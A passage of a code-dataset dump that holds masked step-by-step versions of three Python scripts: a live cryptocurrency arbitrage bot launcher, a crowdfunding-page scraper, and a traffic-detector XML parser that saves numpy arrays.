brokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)
gp = brokers[2]
trade_bot = ArbitrageBot(config, brokers)
trade_bot.start(sleep=1)
print('Done!')
<|reserved_special_token_1|>
from common.utils import create_brokers
from Bot import DataGatherBot, ArbitrageBot
import api_config as config
brokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)
gp = brokers[2]
trade_bot = ArbitrageBot(config, brokers)
trade_bot.start(sleep=1)
print('Done!')
<|reserved_special_token_1|>
from common.utils import create_brokers
from Bot import DataGatherBot, ArbitrageBot
import api_config as config
### Defined as PAPER
# brokers = create_brokers('PAPER', config.CURRENCIES, config.EXCHANGES)
# bot = ArbitrageBot(config, brokers)
# brokers = create_brokers('BACKTEST', config.CURRENCIES, config.EXCHANGES)
# bot = ArbitrageBot(config, brokers) # this automatically loads the data path file.
# backtest_data = '/Users/ericjang/Desktop/LiClipse_Workspace/btc_arbitrage/data/Mar-29-2014_19-00-35__20_14400.p'
# bot.backtest(backtest_data) # start should probably be modified to also allow time ranges (i.e. if i want to run my live trader for 2 hours)
# print('done!')
brokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)
gp = brokers[2]
# gp.update_all_balances()
# gp.xchg.get_all_balances()
# gatherbot = DataGatherBot(config, brokers)
# maxdepth: number of order-book levels to check (-1)
# gatherbot.start(sleep=1, duration=60 * 60 * 4, maxdepth=4) # 5 hours of data, one minute intervals
# for the arbitrage bot
trade_bot = ArbitrageBot(config, brokers)
trade_bot.start(sleep=1)
print('Done!')
|
flexible
|
{
"blob_id": "4436fa36ec21edb3be467f74d8b9705780535f22",
"index": 6786,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntrade_bot.start(sleep=1)\nprint('Done!')\n",
"step-3": "<mask token>\nbrokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)\ngp = brokers[2]\ntrade_bot = ArbitrageBot(config, brokers)\ntrade_bot.start(sleep=1)\nprint('Done!')\n",
"step-4": "from common.utils import create_brokers\nfrom Bot import DataGatherBot, ArbitrageBot\nimport api_config as config\nbrokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)\ngp = brokers[2]\ntrade_bot = ArbitrageBot(config, brokers)\ntrade_bot.start(sleep=1)\nprint('Done!')\n",
"step-5": "from common.utils import create_brokers\nfrom Bot import DataGatherBot, ArbitrageBot\nimport api_config as config\n\n### PAPER 이라고 정의한\n# brokers = create_brokers('PAPER', config.CURRENCIES, config.EXCHANGES)\n# bot = ArbitrageBot(config, brokers)\n\n# brokers = create_brokers('BACKTEST', config.CURRENCIES, config.EXCHANGES)\n# bot = ArbitrageBot(config, brokers) # this automatically loads the data path file.\n# backtest_data = '/Users/ericjang/Desktop/LiClipse_Workspace/btc_arbitrage/data/Mar-29-2014_19-00-35__20_14400.p'\n# bot.backtest(backtest_data) # start should probably be modified to also allow time ranges (i.e. if i want to run my live trader for 2 hours)\n# print('done!')\n\nbrokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)\ngp = brokers[2]\n# gp.update_all_balances()\n# gp.xchg.get_all_balances()\n\n# gatherbot = DataGatherBot(config, brokers)\n# maxdepth 체크할 호가 개수(-1)\n# gatherbot.start(sleep=1, duration=60 * 60 * 4, maxdepth=4) # 5 hours of data, one minute intervals\n\n# arbiragebot의 경우\ntrade_bot = ArbitrageBot(config, brokers)\ntrade_bot.start(sleep=1)\nprint('Done!')\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if r.status_code == 200:
text = r.text
pattern = 'Přispěvatel'
m = re.search(pattern, text)
pattern2 = '<strong>([0-9]{1,})'
m2 = re.search(pattern2, text[m.start():])
pattern3 = 'currency " >([0-9]{1,})'
m3 = re.search(pattern3, text.replace(' ', ''))
with open(path + 'data.json', 'w') as fdata:
json.dump({'date': datetime.datetime.now().isoformat(), 'amount':
m3.group(1), 'supporters': m2.group(1)}, fdata)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
r = requests.get(
'https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids')
path = os.path.dirname(os.path.realpath(__file__)) + '/'
if r.status_code == 200:
text = r.text
pattern = 'Přispěvatel'
m = re.search(pattern, text)
pattern2 = '<strong>([0-9]{1,})'
m2 = re.search(pattern2, text[m.start():])
pattern3 = 'currency " >([0-9]{1,})'
m3 = re.search(pattern3, text.replace(' ', ''))
with open(path + 'data.json', 'w') as fdata:
json.dump({'date': datetime.datetime.now().isoformat(), 'amount':
m3.group(1), 'supporters': m2.group(1)}, fdata)
<|reserved_special_token_1|>
import csv
import datetime
import json
import re
import requests
import os
r = requests.get(
'https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids')
path = os.path.dirname(os.path.realpath(__file__)) + '/'
if r.status_code == 200:
text = r.text
pattern = 'Přispěvatel'
m = re.search(pattern, text)
pattern2 = '<strong>([0-9]{1,})'
m2 = re.search(pattern2, text[m.start():])
pattern3 = 'currency " >([0-9]{1,})'
m3 = re.search(pattern3, text.replace(' ', ''))
with open(path + 'data.json', 'w') as fdata:
json.dump({'date': datetime.datetime.now().isoformat(), 'amount':
m3.group(1), 'supporters': m2.group(1)}, fdata)
<|reserved_special_token_1|>
import csv
import datetime
import json
import re
import requests
import os
r = requests.get("https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids")
path = os.path.dirname(os.path.realpath(__file__)) + "/"
if r.status_code == 200:
text = r.text
pattern = 'Přispěvatel'
m = re.search(pattern, text)
pattern2 = '<strong>([0-9]{1,})'
m2 = re.search(pattern2, text[m.start():])
pattern3 = 'currency " >([0-9]{1,})'
m3 = re.search(pattern3, text.replace(' ', ''))
with open(path + "data.json", "w") as fdata:
json.dump({
"date": datetime.datetime.now().isoformat(),
"amount": m3.group(1),
"supporters": m2.group(1)
}, fdata)
|
flexible
|
{
"blob_id": "f3329962004a4454c04327da56d8dd1d0f1d45e7",
"index": 763,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif r.status_code == 200:\n text = r.text\n pattern = 'Přispěvatel'\n m = re.search(pattern, text)\n pattern2 = '<strong>([0-9]{1,})'\n m2 = re.search(pattern2, text[m.start():])\n pattern3 = 'currency \" >([0-9]{1,})'\n m3 = re.search(pattern3, text.replace(' ', ''))\n with open(path + 'data.json', 'w') as fdata:\n json.dump({'date': datetime.datetime.now().isoformat(), 'amount':\n m3.group(1), 'supporters': m2.group(1)}, fdata)\n",
"step-3": "<mask token>\nr = requests.get(\n 'https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids')\npath = os.path.dirname(os.path.realpath(__file__)) + '/'\nif r.status_code == 200:\n text = r.text\n pattern = 'Přispěvatel'\n m = re.search(pattern, text)\n pattern2 = '<strong>([0-9]{1,})'\n m2 = re.search(pattern2, text[m.start():])\n pattern3 = 'currency \" >([0-9]{1,})'\n m3 = re.search(pattern3, text.replace(' ', ''))\n with open(path + 'data.json', 'w') as fdata:\n json.dump({'date': datetime.datetime.now().isoformat(), 'amount':\n m3.group(1), 'supporters': m2.group(1)}, fdata)\n",
"step-4": "import csv\nimport datetime\nimport json\nimport re\nimport requests\nimport os\nr = requests.get(\n 'https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids')\npath = os.path.dirname(os.path.realpath(__file__)) + '/'\nif r.status_code == 200:\n text = r.text\n pattern = 'Přispěvatel'\n m = re.search(pattern, text)\n pattern2 = '<strong>([0-9]{1,})'\n m2 = re.search(pattern2, text[m.start():])\n pattern3 = 'currency \" >([0-9]{1,})'\n m3 = re.search(pattern3, text.replace(' ', ''))\n with open(path + 'data.json', 'w') as fdata:\n json.dump({'date': datetime.datetime.now().isoformat(), 'amount':\n m3.group(1), 'supporters': m2.group(1)}, fdata)\n",
"step-5": "import csv\nimport datetime\nimport json\nimport re\nimport requests\nimport os\n\nr = requests.get(\"https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids\")\n\npath = os.path.dirname(os.path.realpath(__file__)) + \"/\"\n\nif r.status_code == 200:\n text = r.text\n pattern = 'Přispěvatel'\n m = re.search(pattern, text)\n pattern2 = '<strong>([0-9]{1,})'\n m2 = re.search(pattern2, text[m.start():])\n pattern3 = 'currency \" >([0-9]{1,})'\n m3 = re.search(pattern3, text.replace(' ', ''))\n with open(path + \"data.json\", \"w\") as fdata:\n json.dump({\n \"date\": datetime.datetime.now().isoformat(),\n \"amount\": m3.group(1),\n \"supporters\": m2.group(1)\n }, fdata)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
if detectorID.childNodes[0].data in detname:
lanes = det.getElementsByTagName('lane')
for lane in lanes:
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == 'OK':
try:
laneVolume += int(lane.getElementsByTagName(
'lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName(
'lane-Occupancy')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName(
'lane-Speed')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy / float(laneVolume))
detectorData[c][4].append(laneSpeed / float(laneVolume))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
if detectorID.childNodes[0].data in detname:
lanes = det.getElementsByTagName('lane')
for lane in lanes:
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == 'OK':
try:
laneVolume += int(lane.getElementsByTagName(
'lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName(
'lane-Occupancy')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName(
'lane-Speed')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy / float(laneVolume))
detectorData[c][4].append(laneSpeed / float(laneVolume))
<|reserved_special_token_0|>
os.chdir(month_dir)
<|reserved_special_token_0|>
for dayFile in day_dir:
detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],
[], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [
], []]]
xmlFiles = get_branches_dir(dayFile)
for xml in xmlFiles:
if not os.path.isdir(xml):
print(xml)
tolist(xml, detNames)
for i in range(0, len(detNames)):
m = np.array(detectorData[i])
os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])
np.save(detectorData[0][0][0] + '.npy', m)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
if detectorID.childNodes[0].data in detname:
lanes = det.getElementsByTagName('lane')
for lane in lanes:
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == 'OK':
try:
laneVolume += int(lane.getElementsByTagName(
'lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName(
'lane-Occupancy')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName(
'lane-Speed')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy / float(laneVolume))
detectorData[c][4].append(laneSpeed / float(laneVolume))
month_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'
os.chdir(month_dir)
day_dir = get_branches_dir(month_dir)
detNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D',
'MI044E250.8D', 'MI044E246.6D']
ErrorFiles = []
for dayFile in day_dir:
detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],
[], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [
], []]]
xmlFiles = get_branches_dir(dayFile)
for xml in xmlFiles:
if not os.path.isdir(xml):
print(xml)
tolist(xml, detNames)
for i in range(0, len(detNames)):
m = np.array(detectorData[i])
os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])
np.save(detectorData[0][0][0] + '.npy', m)
<|reserved_special_token_1|>
import os
from xml.dom import minidom
import numpy as np
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
if detectorID.childNodes[0].data in detname:
lanes = det.getElementsByTagName('lane')
for lane in lanes:
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == 'OK':
try:
laneVolume += int(lane.getElementsByTagName(
'lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName(
'lane-Occupancy')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName(
'lane-Speed')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy / float(laneVolume))
detectorData[c][4].append(laneSpeed / float(laneVolume))
month_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'
os.chdir(month_dir)
day_dir = get_branches_dir(month_dir)
detNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D',
'MI044E250.8D', 'MI044E246.6D']
ErrorFiles = []
for dayFile in day_dir:
detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],
[], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [
], []]]
xmlFiles = get_branches_dir(dayFile)
for xml in xmlFiles:
if not os.path.isdir(xml):
print(xml)
tolist(xml, detNames)
for i in range(0, len(detNames)):
m = np.array(detectorData[i])
os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])
np.save(detectorData[0][0][0] + '.npy', m)
<|reserved_special_token_1|>
import os
from xml.dom import minidom
import numpy as np
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
# print"\ndetector-Id: %s" % detectorID.childNodes[0].data
if detectorID.childNodes[0].data in detname:
lanes = det.getElementsByTagName('lane')
for lane in lanes:
# laneNumber = lane.getElementsByTagName('lane-Number')[0]
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == "OK":
try:
laneVolume += int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName('lane-Occupancy')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName('lane-Speed')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy/float(laneVolume))
detectorData[c][4].append(laneSpeed/float(laneVolume))
month_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'
os.chdir(month_dir) # change the current working directory to path.
day_dir = get_branches_dir(month_dir)
detNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D', 'MI044E250.8D', 'MI044E246.6D']
ErrorFiles = []
for dayFile in day_dir:
detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []]]
xmlFiles = get_branches_dir(dayFile)
for xml in xmlFiles:
if not os.path.isdir(xml):
print(xml)
tolist(xml, detNames)
for i in range(0, len(detNames)):
m = np.array(detectorData[i])
os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/'+detNames[i])
np.save(detectorData[0][0][0]+'.npy', m)
|
flexible
|
{
"blob_id": "2b7bb02a25504e7481d3bc637ea09bcf9addb990",
"index": 7699,
"step-1": "<mask token>\n\n\ndef get_branches_dir(root_dir):\n branches_dir = []\n folds = os.listdir(root_dir)\n while folds:\n branch_dir = root_dir + '/' + folds.pop()\n branches_dir.append(branch_dir)\n return branches_dir\n\n\ndef tolist(xml, detname):\n try:\n data = minidom.parse(xml)\n except:\n print('parse error')\n ErrorFiles.append(xml)\n return\n detectors = data.documentElement\n date = detectors.getElementsByTagName('date')[0].childNodes[0].data\n time = detectors.getElementsByTagName('time')[0].childNodes[0].data\n dets = detectors.getElementsByTagName('detector')\n laneVolume = 0\n laneOccupancy = 0\n laneSpeed = 0\n for det in dets:\n try:\n detectorID = det.getElementsByTagName('detector-Id')[0]\n except IndexError:\n continue\n if detectorID.childNodes[0].data in detname:\n lanes = det.getElementsByTagName('lane')\n for lane in lanes:\n laneStatus = lane.getElementsByTagName('lane-Status')[0]\n if laneStatus.childNodes[0].data == 'OK':\n try:\n laneVolume += int(lane.getElementsByTagName(\n 'lane-Volume')[0].childNodes[0].data)\n laneOccupancy += int(lane.getElementsByTagName(\n 'lane-Occupancy')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n laneSpeed += int(lane.getElementsByTagName(\n 'lane-Speed')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n except IndexError:\n break\n else:\n break\n if laneVolume > 0:\n for i in range(0, len(detname)):\n if detectorID.childNodes[0].data == detname[i]:\n c = i\n detectorData[c][0].append(date)\n detectorData[c][1].append(time)\n detectorData[c][2].append(laneVolume)\n detectorData[c][3].append(laneOccupancy / float(laneVolume))\n detectorData[c][4].append(laneSpeed / float(laneVolume))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_branches_dir(root_dir):\n branches_dir = []\n folds = os.listdir(root_dir)\n while folds:\n branch_dir = root_dir + '/' + folds.pop()\n branches_dir.append(branch_dir)\n return branches_dir\n\n\ndef tolist(xml, detname):\n try:\n data = minidom.parse(xml)\n except:\n print('parse error')\n ErrorFiles.append(xml)\n return\n detectors = data.documentElement\n date = detectors.getElementsByTagName('date')[0].childNodes[0].data\n time = detectors.getElementsByTagName('time')[0].childNodes[0].data\n dets = detectors.getElementsByTagName('detector')\n laneVolume = 0\n laneOccupancy = 0\n laneSpeed = 0\n for det in dets:\n try:\n detectorID = det.getElementsByTagName('detector-Id')[0]\n except IndexError:\n continue\n if detectorID.childNodes[0].data in detname:\n lanes = det.getElementsByTagName('lane')\n for lane in lanes:\n laneStatus = lane.getElementsByTagName('lane-Status')[0]\n if laneStatus.childNodes[0].data == 'OK':\n try:\n laneVolume += int(lane.getElementsByTagName(\n 'lane-Volume')[0].childNodes[0].data)\n laneOccupancy += int(lane.getElementsByTagName(\n 'lane-Occupancy')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n laneSpeed += int(lane.getElementsByTagName(\n 'lane-Speed')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n except IndexError:\n break\n else:\n break\n if laneVolume > 0:\n for i in range(0, len(detname)):\n if detectorID.childNodes[0].data == detname[i]:\n c = i\n detectorData[c][0].append(date)\n detectorData[c][1].append(time)\n detectorData[c][2].append(laneVolume)\n detectorData[c][3].append(laneOccupancy / float(laneVolume))\n detectorData[c][4].append(laneSpeed / float(laneVolume))\n\n\n<mask token>\nos.chdir(month_dir)\n<mask token>\nfor dayFile in day_dir:\n detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],\n [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [\n ], []]]\n xmlFiles = get_branches_dir(dayFile)\n for xml in xmlFiles:\n if not os.path.isdir(xml):\n print(xml)\n tolist(xml, detNames)\n for i in range(0, len(detNames)):\n m = np.array(detectorData[i])\n os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])\n np.save(detectorData[0][0][0] + '.npy', m)\n",
"step-3": "<mask token>\n\n\ndef get_branches_dir(root_dir):\n branches_dir = []\n folds = os.listdir(root_dir)\n while folds:\n branch_dir = root_dir + '/' + folds.pop()\n branches_dir.append(branch_dir)\n return branches_dir\n\n\ndef tolist(xml, detname):\n try:\n data = minidom.parse(xml)\n except:\n print('parse error')\n ErrorFiles.append(xml)\n return\n detectors = data.documentElement\n date = detectors.getElementsByTagName('date')[0].childNodes[0].data\n time = detectors.getElementsByTagName('time')[0].childNodes[0].data\n dets = detectors.getElementsByTagName('detector')\n laneVolume = 0\n laneOccupancy = 0\n laneSpeed = 0\n for det in dets:\n try:\n detectorID = det.getElementsByTagName('detector-Id')[0]\n except IndexError:\n continue\n if detectorID.childNodes[0].data in detname:\n lanes = det.getElementsByTagName('lane')\n for lane in lanes:\n laneStatus = lane.getElementsByTagName('lane-Status')[0]\n if laneStatus.childNodes[0].data == 'OK':\n try:\n laneVolume += int(lane.getElementsByTagName(\n 'lane-Volume')[0].childNodes[0].data)\n laneOccupancy += int(lane.getElementsByTagName(\n 'lane-Occupancy')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n laneSpeed += int(lane.getElementsByTagName(\n 'lane-Speed')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n except IndexError:\n break\n else:\n break\n if laneVolume > 0:\n for i in range(0, len(detname)):\n if detectorID.childNodes[0].data == detname[i]:\n c = i\n detectorData[c][0].append(date)\n detectorData[c][1].append(time)\n detectorData[c][2].append(laneVolume)\n detectorData[c][3].append(laneOccupancy / float(laneVolume))\n detectorData[c][4].append(laneSpeed / float(laneVolume))\n\n\nmonth_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'\nos.chdir(month_dir)\nday_dir = get_branches_dir(month_dir)\ndetNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D',\n 'MI044E250.8D', 'MI044E246.6D']\nErrorFiles = []\nfor dayFile in day_dir:\n detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],\n [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [\n ], []]]\n xmlFiles = get_branches_dir(dayFile)\n for xml in xmlFiles:\n if not os.path.isdir(xml):\n print(xml)\n tolist(xml, detNames)\n for i in range(0, len(detNames)):\n m = np.array(detectorData[i])\n os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])\n np.save(detectorData[0][0][0] + '.npy', m)\n",
"step-4": "import os\nfrom xml.dom import minidom\nimport numpy as np\n\n\ndef get_branches_dir(root_dir):\n branches_dir = []\n folds = os.listdir(root_dir)\n while folds:\n branch_dir = root_dir + '/' + folds.pop()\n branches_dir.append(branch_dir)\n return branches_dir\n\n\ndef tolist(xml, detname):\n try:\n data = minidom.parse(xml)\n except:\n print('parse error')\n ErrorFiles.append(xml)\n return\n detectors = data.documentElement\n date = detectors.getElementsByTagName('date')[0].childNodes[0].data\n time = detectors.getElementsByTagName('time')[0].childNodes[0].data\n dets = detectors.getElementsByTagName('detector')\n laneVolume = 0\n laneOccupancy = 0\n laneSpeed = 0\n for det in dets:\n try:\n detectorID = det.getElementsByTagName('detector-Id')[0]\n except IndexError:\n continue\n if detectorID.childNodes[0].data in detname:\n lanes = det.getElementsByTagName('lane')\n for lane in lanes:\n laneStatus = lane.getElementsByTagName('lane-Status')[0]\n if laneStatus.childNodes[0].data == 'OK':\n try:\n laneVolume += int(lane.getElementsByTagName(\n 'lane-Volume')[0].childNodes[0].data)\n laneOccupancy += int(lane.getElementsByTagName(\n 'lane-Occupancy')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n laneSpeed += int(lane.getElementsByTagName(\n 'lane-Speed')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n except IndexError:\n break\n else:\n break\n if laneVolume > 0:\n for i in range(0, len(detname)):\n if detectorID.childNodes[0].data == detname[i]:\n c = i\n detectorData[c][0].append(date)\n detectorData[c][1].append(time)\n detectorData[c][2].append(laneVolume)\n detectorData[c][3].append(laneOccupancy / float(laneVolume))\n detectorData[c][4].append(laneSpeed / float(laneVolume))\n\n\nmonth_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'\nos.chdir(month_dir)\nday_dir = get_branches_dir(month_dir)\ndetNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D',\n 'MI044E250.8D', 'MI044E246.6D']\nErrorFiles = []\nfor dayFile in day_dir:\n detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],\n [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [\n ], []]]\n xmlFiles = get_branches_dir(dayFile)\n for xml in xmlFiles:\n if not os.path.isdir(xml):\n print(xml)\n tolist(xml, detNames)\n for i in range(0, len(detNames)):\n m = np.array(detectorData[i])\n os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])\n np.save(detectorData[0][0][0] + '.npy', m)\n",
